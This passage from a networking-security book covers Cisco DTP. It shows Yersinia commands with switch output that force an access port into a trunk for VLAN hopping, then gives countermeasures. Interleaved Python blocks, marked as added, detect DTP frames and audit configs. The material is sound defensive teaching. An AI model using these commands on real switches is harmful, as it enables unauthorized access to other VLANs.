Understanding Cisco Dynamic Trunking Protocol
To improve the user experience, many modern LAN switches come with a number of
mechanisms and protocols that automate network-configuration chores. Cisco Dynamic
Trunking Protocol (DTP) falls into that category.
Crafting a DTP Attack
DTP is a Cisco-proprietary protocol. Its purpose is to determine whether two switches that
are connected want to create a trunk. If both switches agree, a trunk
is automatically brought up with a set of mutually acceptable parameters, such as
encapsulation and the VLAN range.
NOTE Plenty of DTP literature³ is available in other publications, and it is beyond this book’s scope
to cover all protocol aspects or enumerate matrices of possible DTP combinations. As
a quick reference, here is a description of the different DTP port states:
• Auto. The port listens for DTP frames from the neighboring switch. If the
neighboring switch says it wants to be a trunk, or is a trunk, the auto state creates the
trunk with the neighboring switch. Auto does not convey any intent to become a
trunk; it depends solely on the neighboring switch to make the trunking decision.
• Desirable. DTP is spoken to the neighboring switch. Desirable communicates to the
neighboring switch that it is capable of being a trunk and wants the neighboring
switch to also be a trunk.
• On. DTP is spoken to the neighboring switch. The On state automatically enables
trunking on the port, regardless of the state of its neighboring switch. It remains a
trunk unless it receives a DTP packet that explicitly disables the trunk.
Example 4-2 Cisco IOS Configuration for Unconditional Tagging of Frames
CiscoSwitch(config)#vlan dot1q tag native
or
CiscoSwitch(config)#interface GigabitEthernet2/1
CiscoSwitch(config-if)#switchport trunk native vlan tag
• Nonegotiate. DTP is not spoken to the neighboring switch. Nonegotiate
automatically and unconditionally enables trunking on its port, regardless of the state
of its neighboring switch. This is a common setting toward end stations that can
understand trunking (such as VMware virtual machines).
• Off. Trunking is not allowed on this port regardless of the DTP mode configured on
the other switch.
The fact that DTP is a protocol immediately rings a bell for a hacker. Something along the
lines of, “Let’s see whether I can fool this switch port into becoming a trunk by sending it
a manually crafted DTP frame!” is a natural thought for a LAN hacker. If a switch port has
been configured to send and/or listen to DTP advertisements, a hacker can easily coerce the
port into becoming a trunk (see Example 4-3).
The dynamic port-level configuration indicates to the switch that it should automatically try
to figure out what to do with the port. Although DTP eases the configuration of trunks, it is
potentially dangerous when enabled on user-facing ports.
If you think setting up a DTP attack takes an accomplished hacker who is intimately familiar with
packet-building libraries, remember this: There is always Yersinia.
Figure 4-7 shows that, once again, when it comes to hacking LAN protocols, Yersinia is up
for the challenge. It comes packaged with a DTP frame-injection module that allows a hacker
to send any arbitrary DTP frame to the switch. Also, a prebuilt DTP frame mode can turn
an unsuspecting switch port into a trunk. If a hacker succeeds and transforms a port into a
trunk, hopping VLANs is trivial.
Example 4-3 Configuring a Port to Send and Listen to DTP Packets
CiscoSwitch(config-if)#interface g7/8
CiscoSwitch(config-if)#switchport mode ?
  access        Set trunking mode to ACCESS unconditionally
  dot1q-tunnel  set trunking mode to TUNNEL unconditionally
  dynamic       Set trunking mode to dynamically negotiate access or trunk mode
  private-vlan  Set the mode to private-vlan host or promiscuous
  trunk         Set trunking mode to TRUNK unconditionally
CiscoSwitch(config-if)#switchport mode dynamic ?
  auto       Set trunking mode dynamic negotiation parameter to AUTO
  desirable  Set trunking mode dynamic negotiation parameter to DESIRABLE
Figure 4-7 Yersinia’s DTP Module
Example 4-4 shows the initial port configuration of an actual DTP attack.
Example 4-4 Initial Port Configuration for DTP Exploit
CiscoSwitch#show running-config interface f5/14
Building configuration...
Current configuration : 249 bytes
!
interface FastEthernet5/14
 description SERVER_ETH1
 switchport mode dynamic desirable
 switchport access vlan 100
 no ip address
 logging event link-status
 logging event spanning-tree status
 logging event trunk-status
 spanning-tree portfast
end
CiscoSwitch#show interface f5/14 trunk
Port      Mode         Encapsulation  Status        Native vlan
Fa5/14    desirable    negotiate      not-trunking  1
The port is in dynamic desirable mode and is currently not trunking. Things are about to
change as you fire up Yersinia:
[root@server sample]# yersinia dtp -v 1 -i eth1 -smac 00:ca:fe:be:ef:00 -dmac
01:00:0C:CC:CC:CC -neighbor 00:00:0c:11:22:33 -domain CISCO -attack 0
Ouch!! Invalid attack!! Valid yersinia ATTACK types are:
1: NONDOS attack sending DTP packet
2: NONDOS attack enabling trunking
MOTD: Do you have a Lexicon CX-7? Share it!! ;)
A typo was deliberately introduced in the preceding command to get Yersinia to list the
range of DTP attacks it can perform: a plain-vanilla DTP packet injector and a prebuilt
frame attack that forces the neighboring switch port to become a trunk. Does the switch fall
for the second attack? Here’s the verification:
[root@server sample]# yersinia dtp -v 1 -i eth1 -smac 00:ca:fe:be:ef:00 -dmac
01:00:0C:CC:CC:CC -neighbor 00:00:0c:11:22:33 -domain CISCO -attack 2
<*> Starting NONDOS attack enabling trunking...
<*> Press any key to stop the attack <*>
Two parameters matter in the preceding Yersinia command: the destination MAC address
(01:00:0C:CC:CC:CC) and the VLAN Trunking Protocol (VTP) domain name. The MAC
address is a Cisco-specific multicast MAC address used by several LAN protocols, such as
CDP and VTP. DTP uses the Subnetwork Access Protocol (SNAP) encapsulation, along
with protocol ID 0x2004, to identify itself because the MAC address alone is not sufficient. The
VTP domain must match the domain currently configured on the switch. Some interesting
logs appear on the switch immediately after the attack:
.Jan 25 04:24:45.065: %LINEPROTO-5-UPDOWN: Line protocol on Interface
FastEthernet5/14, changed state to down
Jan 25 04:24:45.054: %LINEPROTO-SP-5-UPDOWN: Line protocol on Interface
FastEthernet5/14, changed state to down
.Jan 25 04:24:48.078: %SVCLC-5-FWTRUNK: Firewalled VLANs configured on trunks
.Jan 25 04:24:48.122: %LINEPROTO-5-UPDOWN: Line protocol on Interface
FastEthernet5/14, changed state to up
Jan 25 04:24:48.107: %LINEPROTO-SP-5-UPDOWN: Line protocol on Interface
FastEthernet5/14, changed state to up
Jan 25 04:24:48.551: %DTP-SP-5-TRUNKPORTON: Port Fa5/14 has become dot1q trunk
Port      Vlans allowed on trunk
Fa5/14    100
Port      Vlans allowed and active in management domain
Fa5/14    100
Port      Vlans in spanning tree forwarding state and not pruned
Fa5/14    100
CiscoSwitch#
According to the last log message, the port has become a trunk! It’s time to double-check,
as Example 4-5 shows.
Sure enough, it worked! With one simple packet, a hacker gets instant access to a whopping
range of 4000+ VLANs. This is impressive, given the minimal amount of effort
involved.
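From the defender's side, the same frame the switch just accepted can be recognised on the wire by the identifiers this passage names (the Cisco multicast MAC, SNAP with the Cisco OUI and protocol ID 0x2004) together with the VTP domain it carries. The parser below is an added example, not code from the book or from Yersinia; the TLV numbering (1 = domain, 2 = status, 4 = neighbor) and the status-byte layout follow Wireshark's DTP dissector and are assumptions here, and the sample frame is constructed to mirror the parameters of the Yersinia command quoted above.

```python
import struct
# Identifiers the page gives for DTP: Cisco multicast MAC 01:00:0C:CC:CC:CC, SNAP with the
# Cisco OUI and protocol ID 0x2004. TLV types and the status-byte layout below follow
# Wireshark's DTP dissector and are assumptions, not something the page states.
CISCO_OUI, DTP_PID = b"\x00\x00\x0c", 0x2004
TLV_DOMAIN, TLV_STATUS, TLV_NEIGHBOR = 1, 2, 4
TAS = {0x00: "on", 0x01: "off", 0x03: "desirable", 0x04: "auto"}   # trunk administrative status

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_dtp(frame):
    """Decode an 802.3/LLC/SNAP frame; return the DTP fields as a dict, or None if not DTP."""
    if (len(frame) < 23 or struct.unpack("!H", frame[12:14])[0] > 1500      # short, or Ethernet II
            or frame[14:17] != b"\xaa\xaa\x03" or frame[17:20] != CISCO_OUI  # not SNAP + Cisco OUI
            or struct.unpack("!H", frame[20:22])[0] != DTP_PID):             # Cisco SNAP, but CDP/VTP/...
        return None
    info = {"dst": mac_str(frame[:6]), "src": mac_str(frame[6:12]), "version": frame[22]}
    pos = 23
    while pos + 4 <= len(frame):
        ttype, tlen = struct.unpack("!HH", frame[pos:pos + 4])   # length covers the 4-byte header too
        if tlen < 4 or pos + tlen > len(frame):
            break                                                 # malformed TLV: keep what we have
        val = frame[pos + 4:pos + tlen]
        if ttype == TLV_DOMAIN:
            info["domain"] = val.rstrip(b"\x00").decode("ascii", "replace")
        elif ttype == TLV_STATUS and val:
            info["tos"] = "trunk" if val[0] & 0x80 else "access"   # trunk operating status
            info["tas"] = TAS.get(val[0] & 0x07, "unknown")
        elif ttype == TLV_NEIGHBOR:
            info["neighbor"] = mac_str(val)
        pos += tlen
    return info

def dtp_on_access_port(frame, expected_domain):
    """Check for a port that should never see DTP: an alert string, or None for non-DTP traffic."""
    info = parse_dtp(frame)
    if info is None:
        return None
    # A frame in the switch's own VTP domain that asks for a trunk is the case the page demonstrates.
    sev = "HIGH" if info.get("domain") == expected_domain and info.get("tas") in ("on", "desirable") else "INFO"
    return f"{sev}: DTP from {info['src']} domain={info.get('domain')} tas={info.get('tas')} tos={info.get('tos')}"

def constructed_sample_frame():
    """Constructed test frame (not a capture), reusing the MACs and domain from the Yersinia command."""
    tlvs = (struct.pack("!HH", TLV_DOMAIN, 10) + b"CISCO\x00"
            + struct.pack("!HH", TLV_STATUS, 5) + b"\x03"            # status 0x03: access / desirable
            + struct.pack("!HH", TLV_NEIGHBOR, 10) + bytes.fromhex("00000c112233"))
    body = b"\xaa\xaa\x03" + CISCO_OUI + struct.pack("!H", DTP_PID) + b"\x01" + tlvs
    return bytes.fromhex("01000ccccccc" "00cafebeef00") + struct.pack("!H", len(body)) + body
```

Feeding the parser frames mirrored from a user-facing port and raising on any DTP at all is the simplest use; the severity split only marks the case where the domain matches and a trunk is requested.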
Countermeasures to DTP Attacks
Fortunately, the antidote to DTP attacks is simple and efficient: Do not leave user-facing
ports in dynamic negotiation mode. Hard-code them as access ports instead and
place them in a static VLAN. This silently drops DTP frames at the port level with no
performance impact. With DTP frames dropped, attempts to force the port into becoming a
trunk fail.
Example 4-5 Verification of the Port’s New Status
6K-3-S720#show interface f5/14 trunk
Port      Mode         Encapsulation  Status        Native vlan
Fa5/14    desirable    n-802.1q       trunking      1
Port      Vlans allowed on trunk
Fa5/14    1-4094
Port      Vlans allowed and active in management domain
Fa5/14    1-3,8-13,15,17-22,39,44-46,48-52,55-71,75-76,80-81,85-90,95,100-102,
104,111-112,120-121,130,150-151,161-162,200-204,210,250-251,265,300-301,304,
350-351,400-407,440-445,448,500-503,550,555,600,665-667,701,720,730,740,750,770,
780,800-802,822-823,839,888,900-904,906,921,997-999,1001,1100-1102,1121,1200-
1300,1448,1500-1501,1800-1801,1822,2000-2001,2500,2800,3120-3121,3500,3850-3851,
3900-3901,4000-4003,4094
Port      Vlans in spanning tree forwarding state and not pruned
Fa5/14    none
6K-3-S720#
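The countermeasure in the section above (user ports hard-coded as access ports in a static VLAN, and intentional trunks that do not negotiate) can be checked against a saved running-config before an attacker checks it for you. The audit script below is an added example, not from the book or from Cisco; its sample configuration is constructed, and the treatment of a port with no explicit switchport mode as a negotiating port reflects the dynamic default of many Catalyst platforms, which is an assumption the page itself does not state.

```python
# Constructed sample running-config (not from the page): the Example 4-4 port, a port
# with no explicit mode, and an uplink trunk that still negotiates.
SAMPLE_CONFIG = """\
interface FastEthernet5/14
 switchport mode dynamic desirable
 switchport access vlan 100
!
interface FastEthernet5/15
 switchport access vlan 200
!
interface GigabitEthernet1/1
 switchport mode trunk
!
"""

def parse_interfaces(config):
    """Split an IOS running-config into {interface name: [stripped config lines]}."""
    stanzas, current = {}, None
    for line in config.splitlines():
        if line.startswith("interface "):
            current = line.split(None, 1)[1]
            stanzas[current] = []
        elif line.startswith(" ") and current is not None:   # indented lines belong to the stanza
            stanzas[current].append(line.strip())
    return stanzas

def audit_dtp(config):
    """Return {interface: (kind, detail)} for ports whose trunk state DTP can still change."""
    findings = {}
    for name, lines in parse_interfaces(config).items():
        mode = next((l for l in lines if l.startswith("switchport mode")), "")
        if not mode:   # assumed: no explicit mode means the platform default, dynamic on many Catalysts
            findings[name] = ("default", "no explicit switchport mode; platform default may negotiate")
        elif "dynamic" in mode:
            findings[name] = ("dynamic", f"{mode}: port sends and/or listens to DTP")
        elif mode.endswith(" trunk") and "switchport nonegotiate" not in lines:
            findings[name] = ("trunk-dtp", "intentional trunk still speaks DTP; add switchport nonegotiate")
    return findings

def remediation(config):
    """IOS commands applying the page's fix: hard-coded access port in its static VLAN."""
    cmds, ifaces = [], parse_interfaces(config)
    for name, (kind, _) in audit_dtp(config).items():
        cmds.append(f"interface {name}")
        if kind == "trunk-dtp":
            cmds.append(" switchport nonegotiate")
            continue
        vlan = next((l.split()[-1] for l in ifaces[name] if l.startswith("switchport access vlan")), "<VLAN-ID>")
        cmds += [" switchport mode access", f" switchport access vlan {vlan}"]   # placeholder VLAN if none set
    return cmds
```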